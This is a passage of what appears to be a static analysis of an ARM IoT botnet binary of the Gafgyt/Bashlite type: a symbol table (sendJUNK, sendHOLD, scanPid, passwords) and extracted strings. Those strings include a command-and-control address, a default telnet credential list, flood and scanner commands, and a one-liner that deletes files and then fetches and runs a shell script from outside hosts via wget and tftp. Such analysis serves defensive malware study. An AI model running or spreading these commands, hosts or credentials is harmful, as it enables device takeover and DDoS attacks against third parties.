  1811.  1738: 00014248    24 FUNC    GLOBAL HIDDEN     2 __GI_pthread_cond_init
  1812.  1739: 00014260    20 FUNC    GLOBAL HIDDEN     2 __GI_pthread_cond_destroy
  1813.  1740: 0001b9e8   140 FUNC    GLOBAL HIDDEN     2 __GI_xdr_u_short
  1814.  1741: 0001b80c     4 FUNC    GLOBAL DEFAULT    2 xdr_u_int
  1815.  1742: 00021e4c   296 FUNC    GLOBAL DEFAULT    2 __divsi3
  1816.  1743: 00008e30   648 FUNC    GLOBAL DEFAULT    2 fdpopen
  1817.  1744: 0001f860    48 FUNC    GLOBAL HIDDEN     2 __GI_fprintf
  1818.  1745: 00013c3c    16 FUNC    GLOBAL DEFAULT    2 pthread_attr_getdetachsta
  1819.  1746: 00039c40     4 OBJECT  GLOBAL DEFAULT   10 __pthread_last_event
  1820.  1747: 0001f3e4    72 FUNC    GLOBAL HIDDEN     2 __get_hosts_byname_r
  1821.  1748: 000167ec    16 FUNC    GLOBAL HIDDEN     2 __stdio_init_mutex
  1822.  1749: 00015c10    40 FUNC    GLOBAL HIDDEN     2 __GI__exit
  1823.  1750: 000170f8    44 FUNC    GLOBAL DEFAULT    2 __libc_recvmsg
  1824.  1751: 00016b80    28 FUNC    GLOBAL DEFAULT    2 strcmp
  1825.  1752: 00014f80   200 FUNC    GLOBAL DEFAULT    2 pthread_mutex_unlock
  1826.  1753: 000197cc   620 FUNC    GLOBAL DEFAULT    2 callrpc
  1827.  1754: 00015b18     0 FUNC    GLOBAL DEFAULT    2 __default_sa_restorer
  1828.  1755: 00039da8    12 OBJECT  GLOBAL HIDDEN    10 __nameserver
  1829.  1756: 0002d02c     0 NOTYPE  WEAK   DEFAULT    9 data_start
  1830.  1757: 0001a860   288 FUNC    GLOBAL DEFAULT    2 _seterr_reply
  1831.  1758: 000189c4    36 FUNC    GLOBAL DEFAULT    2 __rpc_thread_svc_fdset
  1832.  1759: 00039c4c     4 OBJECT  GLOBAL DEFAULT   10 __pthread_manager_reader
  1833.  1760: 000310a0   480 OBJECT  GLOBAL DEFAULT    9 __pthread_initial_thread
  1834.  1761: 00010980    16 FUNC    GLOBAL DEFAULT    2 __h_errno_location
  1835.  1762: 000168e4   260 FUNC    GLOBAL HIDDEN     2 __GI_putc_unlocked
  1836.  1763: 00018974    40 FUNC    GLOBAL HIDDEN     2 __GI___rpc_thread_svc_pol
  1837.  1764: 0000a230   368 FUNC    GLOBAL DEFAULT    2 matchPrompt
  1838.  1765: 000227ec   768 OBJECT  GLOBAL DEFAULT    4 __C_ctype_b_data
  1839.  1766: 00020c68   528 FUNC    GLOBAL HIDDEN     2 __GI_inet_pton
  1840.  1767: 0001f890   760 FUNC    GLOBAL HIDDEN     2 _stdio_fopen
  1841.  1768: 0001b8f8   232 FUNC    GLOBAL HIDDEN     2 __GI_xdr_u_hyper
  1842.  1769: 00013aac   196 FUNC    GLOBAL HIDDEN     2 __GI_pthread_setschedpara
  1843.  1770: 00021fc8     4 FUNC    GLOBAL DEFAULT    3 _fini
  1844.  1771: 0001bb78   200 FUNC    GLOBAL HIDDEN     2 __GI_xdr_opaque
  1845.  1772: 00015c38    44 FUNC    GLOBAL HIDDEN     2 __GI_chdir
  1846.  1773: 0001e120   204 FUNC    GLOBAL DEFAULT    2 authnone_create
  1847.  1774: 00018ad0    40 FUNC    GLOBAL HIDDEN     2 __vfork
  1848.  1775: 00015980    96 FUNC    GLOBAL HIDDEN     2 __GI_mmap
  1849.  1776: 00039cd0    24 OBJECT  GLOBAL DEFAULT   10 __malloc_sbrk_lock
  1850.  1777: 0001e7c8   316 FUNC    GLOBAL HIDDEN     2 __GI_xdr_array
  1851.  1778: 000218b8    52 FUNC    GLOBAL DEFAULT    2 sprintf
  1852.  1779: 000227d0     4 OBJECT  GLOBAL DEFAULT    4 __pthread_offsetof_descr
  1853.  1780: 00015b1c     0 FUNC    GLOBAL DEFAULT    2 __default_rt_sa_restorer
  1854.  1781: 00011944    72 FUNC    GLOBAL DEFAULT    2 __new_sem_trywait
  1855.  1782: 0000923c   208 FUNC    GLOBAL DEFAULT    2 fdgets
  1856.  1783: 00012e68    76 FUNC    WEAK   DEFAULT    2 msync
  1857.  1784: 0001df84   232 FUNC    WEAK   DEFAULT    2 strerror_r
  1858.  1785: 0001e06c    92 FUNC    GLOBAL HIDDEN     2 __GI_ffs
  1859.  1786: 000164d0    48 FUNC    WEAK   HIDDEN     2 __GI_select
  1860.  1787: 00016648     8 FUNC    GLOBAL DEFAULT    2 __libc_waitpid
  1861.  1788: 000126e0    16 FUNC    GLOBAL DEFAULT    2 __pthread_unlock
  1862.  1789: 00039ad4     4 OBJECT  GLOBAL HIDDEN    10 __libc_multiple_threads
  1863.  1790: 000118f8    36 FUNC    GLOBAL DEFAULT    2 sem_open
  1864.  1791: 0001bae4   144 FUNC    GLOBAL HIDDEN     2 __GI_xdr_bool
  1865.  1792: 000189e8   176 FUNC    GLOBAL DEFAULT    2 __rpc_thread_destroy
  1866.  1793: 00012ae0    76 FUNC    WEAK   HIDDEN     2 __GI_waitpid
  1867.  1794: 0001b80c     4 FUNC    GLOBAL HIDDEN     2 __GI_xdr_u_int
  1868.  1795: 0001ccfc   188 FUNC    GLOBAL HIDDEN     2 __GI_vfprintf
  1869.  1796: 0001bb74     4 FUNC    GLOBAL HIDDEN     2 __GI_xdr_enum
  1870.  1797: 000167fc   184 FUNC    GLOBAL HIDDEN     2 _stdio_term
  1871.  1798: 0002144c   220 FUNC    GLOBAL HIDDEN     2 __decode_answer
  1872.  1799: 00017308   184 FUNC    GLOBAL HIDDEN     2 __GI_signal
  1873.  1800: 00013d70    64 FUNC    GLOBAL DEFAULT    2 __pthread_attr_setguardsi
  1874.  1801: 00031558     4 OBJECT  GLOBAL DEFAULT    9 stderr
  1875.  1802: 00035a40     4 OBJECT  GLOBAL DEFAULT   10 __pthread_exit_requested
  1876.  1803: 0002d030     4 OBJECT  GLOBAL DEFAULT    9 commServer
  1877.  1804: 00013cd0    16 FUNC    GLOBAL DEFAULT    2 __pthread_attr_getguardsi
  1878.  1805: 00035a3c     4 OBJECT  GLOBAL DEFAULT   10 __pthread_manager_thread_
  1879.  1806: 00014a38     8 FUNC    GLOBAL HIDDEN     2 __GI_pthread_exit
  1880.  1807: 0001175c     4 FUNC    GLOBAL DEFAULT    2 vfork
  1881.  1808: 00031540     4 OBJECT  GLOBAL DEFAULT    9 __C_ctype_b
  1882.  1809: 00015048    12 FUNC    GLOBAL DEFAULT    2 __pthread_once_fork_paren
  1883.  1810: 00017b70   124 FUNC    GLOBAL DEFAULT    2 srandom
  1884.  1811: 0001d54c   412 FUNC    GLOBAL HIDDEN     2 _ppfs_setargs
  1885.  1812: 0001717c    52 FUNC    WEAK   HIDDEN     2 __GI_sendto
  1886.  1813: 0001726c    24 FUNC    GLOBAL HIDDEN     2 __GI_sigemptyset
  1887.  1814: 0001ca94    60 FUNC    GLOBAL HIDDEN     2 __GI_printf
  1888.  1815: 00015cbc    44 FUNC    GLOBAL DEFAULT    2 __libc_fork
  1889.  1816: 0001729c    48 FUNC    GLOBAL DEFAULT    2 sigismember
  1890.  1817: 00031860    24 OBJECT  GLOBAL DEFAULT    9 __atexit_lock
  1891.  1818: 00039c2c     4 OBJECT  GLOBAL DEFAULT   10 scanPid
  1892.  1819: 00014808     4 FUNC    GLOBAL DEFAULT    2 __linuxthreads_reap_event
  1893.  1820: 00012f5c    60 FUNC    WEAK   DEFAULT    2 fsync
  1894.  1821: 000082a0   312 FUNC    GLOBAL DEFAULT    2 rand_cmwc
  1895.  1822: 00010dec  1880 FUNC    GLOBAL DEFAULT    2 __pthread_manager
  1896.  1823: 00015f44    44 FUNC    GLOBAL DEFAULT    2 __libc_lseek
  1897.  1824: 0001b194   144 FUNC    GLOBAL HIDDEN     2 __GI_xprt_unregister
  1898.  1825: 000209a0   480 FUNC    GLOBAL DEFAULT    2 clnt_sperror
  1899.  1826: 0001e638   276 FUNC    GLOBAL HIDDEN     2 __GI_pmap_set
  1900.  1827: 00013184    16 FUNC    GLOBAL DEFAULT    2 __pthread_getconcurrency
  1901.  1828: 000125d0   272 FUNC    GLOBAL DEFAULT    2 __pthread_alt_timedlock
  1902.  1829: 00015b94    80 FUNC    GLOBAL DEFAULT    2 __libc_fcntl64
  1903.  1830: 00013f60    60 FUNC    WEAK   DEFAULT    2 _pthread_cleanup_push
  1904.  1831: 00012cec    84 FUNC    WEAK   DEFAULT    2 pread
  1905.  1832: 0001315c    16 FUNC    GLOBAL DEFAULT    2 pthread_self
  1906.  1833: 00014028    92 FUNC    GLOBAL DEFAULT    2 pthread_setcanceltype
  1907.  1834: 00017068    48 FUNC    GLOBAL DEFAULT    2 getsockopt
  1908.  1835: 0001cad0   304 FUNC    GLOBAL HIDDEN     2 __GI_fseeko64
  1909.  1836: 00015218    12 FUNC    GLOBAL DEFAULT    2 __pthread_once_fork_prepa
  1910.  1837: 00014e48    16 FUNC    GLOBAL DEFAULT    2 pthread_mutexattr_init
  1911.  1838: 00016608    20 FUNC    GLOBAL DEFAULT    2 __libc_wait
  1912.  1839: 00020468   484 FUNC    GLOBAL DEFAULT    2 fflush_unlocked
  1913.  1840: 000168b4    48 FUNC    GLOBAL HIDDEN     2 __stdio_wcommit
  1914.  1841: 00039bfc     4 OBJECT  GLOBAL HIDDEN    10 __exit_slots
  1915.  1842: 0002199c   304 FUNC    GLOBAL HIDDEN     2 __GI___fgetc_unlocked
  1916.  1843: 00039db4     4 OBJECT  GLOBAL HIDDEN    10 __nameservers
  1917.  1844: 00016a1c   172 FUNC    GLOBAL DEFAULT    2 fwrite_unlocked
  1918.  1845: 00016f34   128 FUNC    GLOBAL DEFAULT    2 inet_ntoa_r
  1919.  1846: 00039ae0     4 OBJECT  GLOBAL DEFAULT   10 __pagesize
  1920.  1847: 00031568    24 OBJECT  GLOBAL DEFAULT    9 _stdio_openlist_add_lock
  1921.  1848: 000106e8    24 FUNC    GLOBAL DEFAULT    2 __aeabi_uidivmod
  1922.  1849: 00015d14    40 FUNC    GLOBAL HIDDEN     2 __GI_getdtablesize
  1923.  1850: 000170f8    44 FUNC    WEAK   HIDDEN     2 __GI_recvmsg
  1924.  1851: 00013c64    16 FUNC    GLOBAL HIDDEN     2 __GI_pthread_attr_getsche
  1925.  1852: 0001f458   252 FUNC    GLOBAL HIDDEN     2 __drand48_iterate
  1926.  1853: 000318bc     0 NOTYPE  GLOBAL DEFAULT  ABS _edata
  1927.  1854: 00031560     4 OBJECT  GLOBAL DEFAULT    9 __stdout
  1928.  1855: 000195f4   236 FUNC    GLOBAL HIDDEN     2 __GI_memrchr
  1929.  1856: 00020468   484 FUNC    GLOBAL HIDDEN     2 __GI_fflush_unlocked
  1930.  1857: 0001b79c   112 FUNC    GLOBAL HIDDEN     2 __GI_xdr_u_long
  1931.  1858: 00016d24   248 FUNC    GLOBAL HIDDEN     2 __GI_strstr
  1932.  1859: 00039db8     4 OBJECT  GLOBAL HIDDEN    10 __searchdomains
  1933.  1860: 00039dd4     0 NOTYPE  GLOBAL DEFAULT  ABS _end
  1934.  1861: 0001e288   348 FUNC    GLOBAL DEFAULT    2 bindresvport
  1935.  1862: 000227c8     4 OBJECT  GLOBAL DEFAULT    4 __pthread_threads_max
  1936.  1863: 00016f20    20 FUNC    GLOBAL DEFAULT    2 htons
  1937.  1864: 00014df4    84 FUNC    GLOBAL DEFAULT    2 pthread_mutex_destroy
  1938.  1865: 00039cec   128 OBJECT  GLOBAL DEFAULT   10 svc_fdset
  1939.  1866: 0001899c    40 FUNC    GLOBAL DEFAULT    2 __rpc_thread_createerr
  1940.  1867: 00039c50   128 OBJECT  GLOBAL HIDDEN    10 _sigintr
  1941.  1868: 0001d514    56 FUNC    GLOBAL HIDDEN     2 _ppfs_prepargs
  1942.  1869: 0001df20    80 FUNC    GLOBAL HIDDEN     2 __GI_strspn
  1943.  1870: 0002199c   304 FUNC    GLOBAL DEFAULT    2 fgetc_unlocked
  1944.  1871: 00017e08   200 FUNC    GLOBAL DEFAULT    2 initstate_r
  1945.  1872: 00015150   200 FUNC    GLOBAL DEFAULT    2 pthread_mutex_lock
  1946.  1873: 0001ae28   416 FUNC    GLOBAL HIDDEN     2 __GI_svc_getreq_common
  1947.  1874: 00011874    16 FUNC    GLOBAL DEFAULT    2 __new_sem_getvalue
  1948.  1875: 00017010    44 FUNC    WEAK   HIDDEN     2 __GI_connect
  1949.  1876: 00039c00     4 OBJECT  GLOBAL HIDDEN    10 __curbrk
  1950.  1877: 00011874    16 FUNC    WEAK   DEFAULT    2 sem_getvalue
  1951.  1878: 000160f4    44 FUNC    GLOBAL DEFAULT    2 __libc_poll
  1952.  1879: 00014618   408 FUNC    GLOBAL DEFAULT    2 pthread_cond_wait
  1953.  1880: 00039d94     4 OBJECT  GLOBAL DEFAULT   10 _dl_phnum
  1954.  1881: 000130a0    16 FUNC    GLOBAL HIDDEN     2 __GI_pthread_equal
  1955.  1882: 0001fc2c  1640 FUNC    GLOBAL HIDDEN     2 _fpmaxtostr
  1956.  1883: 0001b06c    96 FUNC    GLOBAL DEFAULT    2 svc_unregister
  1957.  1884: 00010990    16 FUNC    GLOBAL DEFAULT    2 __errno_location
  1958.  1885: 0003147c     4 OBJECT  GLOBAL DEFAULT    9 __pthread_timedsuspend
  1959.  1886: 00009598    88 FUNC    GLOBAL DEFAULT    2 uppercase
  1960.  1887: 0001a6c4   324 FUNC    GLOBAL HIDDEN     2 __GI_pmap_getport
  1961.  1888: 0001801c   408 FUNC    GLOBAL HIDDEN     2 _stdlib_strto_l
  1962.  1889: 00015ff4    92 FUNC    GLOBAL HIDDEN     2 __GI___libc_open
  1963.  1890: 000181b4   148 FUNC    GLOBAL DEFAULT    2 exit
  1964.  1891: 00018c08   188 FUNC    GLOBAL HIDDEN     2 __stdio_WRITE
  1965.  1892: 0001677c   112 FUNC    GLOBAL HIDDEN     2 _stdio_init
  1966.  1893: 00013d70    64 FUNC    WEAK   DEFAULT    2 pthread_attr_setguardsize
  1967.  1894: 00015d3c    44 FUNC    GLOBAL HIDDEN     2 __GI_geteuid
  1968.  1895: 00017150    44 FUNC    WEAK   HIDDEN     2 __GI_sendmsg
  1969.  1896: 000107cc   228 FUNC    GLOBAL DEFAULT    2 __modsi3
  1970.  1897: 000176c8   148 FUNC    GLOBAL DEFAULT    2 __heap_alloc
  1971.  1898: 0001723c    48 FUNC    GLOBAL DEFAULT    2 sigdelset
  1972.  1899: 00020fdc   608 FUNC    GLOBAL DEFAULT    2 inet_ntop
  1973.  1900: 0001c9f4    60 FUNC    GLOBAL DEFAULT    2 brk
  1974.  1901: 000153b0   196 FUNC    GLOBAL DEFAULT    2 pthread_mutex_trylock
  1975.  1902: 00014084    92 FUNC    GLOBAL HIDDEN     2 __GI_pthread_setcancelsta
  1976.  1903: 00039d6c    12 OBJECT  GLOBAL DEFAULT   10 _null_auth
  1977.  1904: 00011760   164 FUNC    GLOBAL DEFAULT    2 pthread_atfork
  1978.  1905: 00022aec   768 OBJECT  GLOBAL DEFAULT    4 __C_ctype_toupper_data
  1979.  1906: 0001c9d0    36 FUNC    GLOBAL DEFAULT    2 _dl_aux_init
  1980.  1907: 0000e0a4  1304 FUNC    GLOBAL DEFAULT    2 sendJUNK
  1981.  1908: 0001f818    72 FUNC    GLOBAL HIDDEN     2 __GI_perror
  1982.  1909: 00017150    44 FUNC    GLOBAL DEFAULT    2 __libc_sendmsg
  1983.  1910: 00037a90     4 OBJECT  WEAK   DEFAULT   10 _errno
  1984.  1911: 0001b3c4   112 FUNC    GLOBAL DEFAULT    2 _authenticate
  1985.  1912: 00015e04    44 FUNC    GLOBAL HIDDEN     2 __GI_gettimeofday
  1986.  1913: 00018008    12 FUNC    GLOBAL DEFAULT    2 atoi
  1987.  1914: 00031580    24 OBJECT  GLOBAL DEFAULT    9 _stdio_openlist_del_lock
  1988.  1915: 00014260    20 FUNC    GLOBAL DEFAULT    2 pthread_cond_destroy
  1989.  1916: 0001c178   236 FUNC    GLOBAL HIDDEN     2 __GI_inet_aton
  1990.  1917: 000108b0     4 FUNC    GLOBAL DEFAULT    2 __aeabi_idiv0
  1991.  1918: 00013c4c    24 FUNC    GLOBAL DEFAULT    2 pthread_attr_setschedpoli
  1992.  1919: 0001b224   128 FUNC    GLOBAL HIDDEN     2 __GI_svc_getreq_poll
  1993.  1920: 0002064c   152 FUNC    GLOBAL DEFAULT    2 fgets_unlocked
  1994.  1921: 00014e88    12 FUNC    GLOBAL HIDDEN     2 __pthread_mutexattr_getps
  1995.  1922: 0001f42c    44 FUNC    GLOBAL HIDDEN     2 __GI_bind
  1996.  1923: 00015c10    40 FUNC    GLOBAL DEFAULT    2 _exit
  1997.  1924: 00008d10    68 FUNC    GLOBAL DEFAULT    2 szprintf
  1998.  1925: 00013194   256 FUNC    GLOBAL DEFAULT    2 __pthread_timedsuspend_ne
  1999.  1926: 0003146c     4 OBJECT  GLOBAL DEFAULT    9 __pthread_sig_cancel
  2000.  1927: 0001b6b8     8 FUNC    GLOBAL HIDDEN     2 __GI_xdr_void
  2001.  1928: 00015f44    44 FUNC    WEAK   HIDDEN     2 __GI_lseek
  2002.  1929: 00031468     4 OBJECT  GLOBAL DEFAULT    9 __pthread_sig_restart
  2003.  1930: 0001df20    80 FUNC    GLOBAL DEFAULT    2 strspn
  2004.  1931: 000108b4    80 FUNC    GLOBAL DEFAULT    2 __muldi3
  2005.  1932: 000227d4     4 OBJECT  GLOBAL DEFAULT    4 __pthread_offsetof_pid
  2006.  1933: 00017098    44 FUNC    GLOBAL DEFAULT    2 __libc_recv
  2007.  1934: 00031460     4 OBJECT  GLOBAL DEFAULT    9 __pthread_main_thread
  2008.  1935: 00014dc4    48 FUNC    GLOBAL DEFAULT    2 pthread_mutex_init
  2009.  1936: 00013f9c    96 FUNC    GLOBAL DEFAULT    2 __pthread_cleanup_pop_res
  2010.  1937: 00016050    16 FUNC    GLOBAL DEFAULT    2 __libc_creat
  2011.  1938: 00013d1c    16 FUNC    GLOBAL DEFAULT    2 __pthread_attr_getstacksi
  2012.  1939: 00016ba0    96 FUNC    GLOBAL DEFAULT    2 strlen
  2013.  1940: 0001ca30    88 FUNC    GLOBAL HIDDEN     2 __GI___cmsg_nxthdr
  2014.  1941: 00012eb4    92 FUNC    WEAK   DEFAULT    2 lseek64
  2015.  1942: 00012dcc    88 FUNC    WEAK   DEFAULT    2 open
  2016.  1943: 00015ac4    68 FUNC    GLOBAL DEFAULT    2 clone
  2017.  1944: 0001e7c8   316 FUNC    GLOBAL DEFAULT    2 xdr_array
  2018.  1945: 00016694    52 FUNC    GLOBAL DEFAULT    2 toupper
  2019.  1946: 00016650    44 FUNC    GLOBAL DEFAULT    2 __libc_write
  2020.  1947: 0001d734  1220 FUNC    GLOBAL HIDDEN     2 _ppfs_parsespec
  2021.  1948: 00018014     8 FUNC    GLOBAL HIDDEN     2 __GI_strtol
  2022.  1949: 00018b84    44 FUNC    GLOBAL HIDDEN     2 __GI_getuid
  2023.  1950: 000196e0   116 FUNC    GLOBAL HIDDEN     2 __GI_strtok_r
  2024.  1951: 00037a90     4 OBJECT  GLOBAL HIDDEN    10 __GI_errno
  2025.  1952: 000115c8   404 FUNC    GLOBAL HIDDEN     2 __fork
  2026.  1953: 0001717c    52 FUNC    GLOBAL DEFAULT    2 __libc_sendto
  2027.  1954: 00018dfc   260 FUNC    GLOBAL HIDDEN     2 __stdio_trans2w_o
  2028.  1955: 00018ad0    40 FUNC    WEAK   HIDDEN     2 __GI_vfork
  2029.  1956: 0001b3c4   112 FUNC    GLOBAL HIDDEN     2 __GI__authenticate
  2030.  1957: 00016c00   264 FUNC    WEAK   DEFAULT    2 strchr
  2031.  1958: 0001dcd0   184 FUNC    GLOBAL HIDDEN     2 __GI_rawmemchr
  2032.  1959: 0001c7d0   104 FUNC    GLOBAL HIDDEN     2 __GI_srand48_r
  2033.  1960: 0001dbf8   140 FUNC    GLOBAL DEFAULT    2 fputs
  2034.  1961: 00039d78     4 OBJECT  GLOBAL DEFAULT   10 svc_max_pollfd
  2035.  1962: 00012344    48 FUNC    GLOBAL HIDDEN     2 __GI_raise
  2036.  1963: 00013dd0    84 FUNC    GLOBAL DEFAULT    2 pthread_attr_setschedpara
  2037.  1964: 0002d020     0 NOTYPE  GLOBAL DEFAULT    9 __data_start
  2038.  1965: 000227cc     4 OBJECT  GLOBAL DEFAULT    4 __pthread_sizeof_handle
  2039.  1966: 000227c4     4 OBJECT  GLOBAL DEFAULT    4 __pthread_provide_wrapper
  2040.  1967: 0001652c    44 FUNC    GLOBAL DEFAULT    2 setsid
  2041.  1968: 00016fc0    36 FUNC    GLOBAL HIDDEN     2 __GI_inet_addr
  2042.  1969: 0001b06c    96 FUNC    GLOBAL HIDDEN     2 __GI_svc_unregister
  2043.  1970: 00014274     8 FUNC    GLOBAL HIDDEN     2 __GI_pthread_condattr_ini
  2044.  1971: 00039d7c    16 OBJECT  GLOBAL DEFAULT   10 rpc_createerr
  2045.  1972: 00015f70    44 FUNC    GLOBAL DEFAULT    2 __libc_msync
  2046.  1973: 00021b48   168 FUNC    GLOBAL HIDDEN     2 __encode_dotted
  2047.  1974: 0001de40   224 FUNC    GLOBAL HIDDEN     2 __GI_strnlen
  2048.  1975: 00000000     0 NOTYPE  WEAK   DEFAULT  UND _Jv_RegisterClasses
  2049.  1976: 000318e8     6 OBJECT  GLOBAL DEFAULT   10 macAddress
  2050.  1977: 00039c44     4 OBJECT  GLOBAL DEFAULT   10 __pthread_threads_debug
  2051.  1978: 00013c24    24 FUNC    GLOBAL DEFAULT    2 pthread_attr_setdetachsta
  2052.  1979: 000128f8    76 FUNC    WEAK   DEFAULT    2 recvmsg
  2053.  1980: 000168e4   260 FUNC    GLOBAL DEFAULT    2 fputc_unlocked
  2054.  1981: 00039d8c     4 OBJECT  GLOBAL DEFAULT   10 svc_pollfd
  2055.  1982: 0000a3a0   676 FUNC    GLOBAL DEFAULT    2 readUntil
  2056.  1983: 000165ac    48 FUNC    GLOBAL DEFAULT    2 __libc_sigsuspend
  2057.  1984: 0001b810   232 FUNC    GLOBAL HIDDEN     2 __GI_xdr_hyper
  2058.  1985: 00012f98    88 FUNC    WEAK   DEFAULT    2 fcntl
  2059.  1986: 0001bdf8   232 FUNC    GLOBAL HIDDEN     2 __GI_xdr_bytes
  2060.  1987: 000164a4    44 FUNC    GLOBAL DEFAULT    2 sched_yield
  2061.  1988: 00014a40   480 FUNC    GLOBAL DEFAULT    2 pthread_join
  2062.  1989: 0001e74c    40 FUNC    GLOBAL HIDDEN     2 __GI__rpc_dtablesize
  2063.  1990: 00021f74    24 FUNC    GLOBAL DEFAULT    2 __aeabi_idivmod
  2064.  1991: 00013184    16 FUNC    WEAK   DEFAULT    2 pthread_getconcurrency
  2065.  1992: 00018008    12 FUNC    GLOBAL HIDDEN     2 __GI_atoi
  2066.  1993: 0001cad0   304 FUNC    GLOBAL DEFAULT    2 fseeko64
  2067.  1994: 00014414   516 FUNC    GLOBAL DEFAULT    2 pthread_cond_timedwait
  2068.  1995: 000218b8    52 FUNC    GLOBAL HIDDEN     2 __GI_sprintf
  2069.  1996: 00019c40   620 FUNC    GLOBAL DEFAULT    2 clntudp_bufcreate
  2070.  1997: 000318b4     4 OBJECT  GLOBAL DEFAULT    9 __ctype_tolower
  2071.  1998: 00000000     0 NOTYPE  WEAK   DEFAULT  UND __register_frame_info
  2072.  1999: 0001afc8    96 FUNC    GLOBAL HIDDEN     2 __GI_svc_getreqset
  2073.  2000: 00013c8c    16 FUNC    GLOBAL HIDDEN     2 __GI_pthread_attr_getinhe
  2074.  2001: 00012148   368 FUNC    GLOBAL DEFAULT    2 sigwait
  2075.  2002: 0001f560    80 FUNC    GLOBAL DEFAULT    2 wcrtomb
  2076.  2003: 0001703c    44 FUNC    GLOBAL HIDDEN     2 __GI_getsockname
  2077.  2004: 0001894c    40 FUNC    GLOBAL HIDDEN     2 __GI___rpc_thread_svc_max
  2078.  2005: 00012c2c    84 FUNC    WEAK   DEFAULT    2 pwrite
  2079.  2006: 00012ff0    60 FUNC    WEAK   DEFAULT    2 close
  2080.  2007: 00017010    44 FUNC    GLOBAL DEFAULT    2 __libc_connect
  2081.  2008: 0002d058    32 OBJECT  GLOBAL DEFAULT    9 passwords
  2082.  2009: 00013db0    32 FUNC    GLOBAL DEFAULT    2 pthread_attr_getschedpara
  2083.  2010: 0001c7d0   104 FUNC    GLOBAL DEFAULT    2 srand48_r
  2084.  2011: 00016ba0    96 FUNC    GLOBAL HIDDEN     2 __GI_strlen
  2085.  2012: 0000e5bc  1472 FUNC    GLOBAL DEFAULT    2 sendHOLD
  2086.  2013: 000318d8     4 OBJECT  GLOBAL DEFAULT   10 mainCommSock
  2087.  2014: 00039c30     4 OBJECT  GLOBAL DEFAULT   10 pids
  2088.  2015: 0001ccfc   188 FUNC    GLOBAL DEFAULT    2 vfprintf
  2089.  2016: 00019754    64 FUNC    GLOBAL DEFAULT    2 strpbrk
  2090.  2017: 00015798   136 FUNC    GLOBAL DEFAULT    2 pthread_setspecific
  2091.  2018: 0001b798     4 FUNC    GLOBAL DEFAULT    2 xdr_int
  2092.  2019: 0001b810   232 FUNC    GLOBAL DEFAULT    2 xdr_hyper
  2093.  2020: 000095f0   576 FUNC    GLOBAL DEFAULT    2 getBogos
  2094.  2021: 000165ac    48 FUNC    WEAK   DEFAULT    2 sigsuspend
  2095.  2022: 0001fb88   112 FUNC    GLOBAL HIDDEN     2 _load_inttype
  2096.  2023: 00012344    48 FUNC    GLOBAL DEFAULT    2 raise
  2097.  2024: 000207dc    76 FUNC    GLOBAL DEFAULT    2 clnt_sperrno
  2098.  2025: 000175d8   240 FUNC    GLOBAL DEFAULT    2 free
  2099.  2026: 0001b9e8   140 FUNC    GLOBAL DEFAULT    2 xdr_u_short
  2100.  2027: 00016558    84 FUNC    GLOBAL DEFAULT    2 sigprocmask
  2101.  2028: 000168e4   260 FUNC    GLOBAL DEFAULT    2 __fputc_unlocked
  2102.  2029: 0001e120   204 FUNC    GLOBAL HIDDEN     2 __GI_authnone_create
  2103.  2030: 0001703c    44 FUNC    GLOBAL DEFAULT    2 getsockname
  2104.  2031: 0001b708   144 FUNC    GLOBAL HIDDEN     2 __GI_xdr_short
  2105.  
  2106. No version information found in this file.
  2107.  
  2108.  
  2109.  
  2110.  
  2111. ===========================================================================
  2112.  
  2113.  
  2114.  
  2115. @ #!
  2116. !1C "
  2117. 176.123.7.23:169
  2118. root
  2119. admin
  2120. user
  2121. login
  2122. guest
  2123. support
  2124. netgear
  2125. cisco
  2126. default
  2127. pass
  2128. password
  2129. (null)
  2130. buf: %s
  2131. /bin/sh
  2132. /proc/cpuinfo
  2133. BOGOMIPS
  2134. PING
  2135. :>%$#
  2136. %d.%d.%d.%d
  2137. %d.%d.%d.0
  2138. ogin:
  2139. assword:
  2140. ncorrect
  2141. shell
  2142. cd /tmp || cd /var/run; rm -rf *; busybox wget http://185.62.190.222/dd/dd.sh || wget http://185.62.190.222/dd/dd.sh; sh dd.sh; rm -rf dd.sh; busybox tftp -r .dd.sh -g 176.123.7.23 || tftp -r .dd.sh -g dd.updatebits.su; sh .dd.sh; rm -rf .dd.sh
  2143. /bin/busybox;echo -e 'gayfgt'
  2144. ulti-call
  2145. REPORT %s:%s:%s
  2146. gayfgt
  2147. Failed opening raw socket.
  2148. Failed setting raw headers mode.
  2149. Invalid flag "%s"
  2150. PONG!
  2151. GETLOCALIP
  2152. My IP: %s
  2153. SCANNER
  2154. SCANNER ON | OFF
  2155. FORK
  2156. HOLD
  2157. JUNK
  2158. KILLATTK
  2159. Killed %d.
  2160. None Killed.
  2161. LOLNOGTFO
  2162. 8.8.8.8
  2163. /proc/net/route
  2164.     00000000   
  2165. [cpuset]
  2166. fork failed
  2167. FAILED TO CONNECT
  2168. PONG
  2169. %s 2>&1
  2170. LINK CLOSED
  2171. 0.9.30
  2172. /bin/sh
  2173. /dev/null
  2174. clntudp_create: out of memory
  2175. bad auth_len gid %d str %d auth %d
  2176. xdr_string: out of memory
  2177. xdr_bytes: out of memory
  2178. (nil)
  2179. (null)
  2180. hlLjztqZ
  2181. npxXoudifFeEgGaACScs
  2182. +0-#'I
  2183. Unknown error
  2184. Success
  2185. Operation not permitted
  2186. No such file or directory
  2187. No such process
  2188. Interrupted system call
  2189. Input/output error
  2190. No such device or address
  2191. Argument list too long
  2192. Exec format error
  2193. Bad file descriptor
  2194. No child processes
  2195. Resource temporarily unavailable
  2196. Cannot allocate memory
  2197. Permission denied
  2198. Bad address
  2199. Block device required
  2200. Device or resource busy
  2201. File exists
  2202. Invalid cross-device link
  2203. No such device
  2204. Not a directory
  2205. Is a directory
  2206. Invalid argument
  2207. Too many open files in system
  2208. Too many open files
  2209. Inappropriate ioctl for device
  2210. Text file busy
  2211. File too large
  2212. No space left on device
  2213. Illegal seek
  2214. Read-only file system
  2215. Too many links
  2216. Broken pipe
  2217. Numerical argument out of domain
  2218. Numerical result out of range
  2219. Resource deadlock avoided
  2220. File name too long
  2221. No locks available
  2222. Function not implemented
  2223. Directory not empty
  2224. Too many levels of symbolic links
  2225. No message of desired type
  2226. Identifier removed
  2227. Channel number out of range
  2228. Level 2 not synchronized
  2229. Level 3 halted
  2230. Level 3 reset
  2231. Link number out of range
  2232. Protocol driver not attached
  2233. No CSI structure available
  2234. Level 2 halted
  2235. Invalid exchange
  2236. Invalid request descriptor
  2237. Exchange full
  2238. No anode
  2239. Invalid request code
  2240. Invalid slot
  2241. Bad font file format
  2242. Device not a stream
  2243. No data available
  2244. Timer expired
  2245. Out of streams resources
  2246. Machine is not on the network
  2247. Package not installed
  2248. Object is remote
  2249. Link has been severed
